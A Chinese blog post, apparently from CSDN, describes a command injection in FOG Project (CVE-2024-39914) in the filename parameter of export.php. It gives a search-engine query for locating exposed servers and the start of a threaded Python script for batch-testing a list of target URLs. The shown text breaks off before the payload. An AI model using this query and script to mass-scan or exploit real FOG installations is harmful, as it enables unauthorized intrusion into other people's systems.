FOG Project 文件名命令注入漏洞批量POC脚本(CVE-2024-39914)

漏洞描述

FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下,FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/management/export.php的文件名filename参数中。

漏洞影响

FOGPROJECT < 1.5.10.34 版本

搜索语句

鹰图平台:web.body="FOG Project" 

批量脚本

import requests
import threading


class fog_poc:
    def __init__(self, file_path):
        file_path = file_path.replace('\"', '')
        file_path = file_path.replace('\'', '')
        with open(file_path, 'r') as f:
            self.url_list = f.readlines()

    def poc(self):
        #构造poc
        url_path = '/fog/management/export.php?filen
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值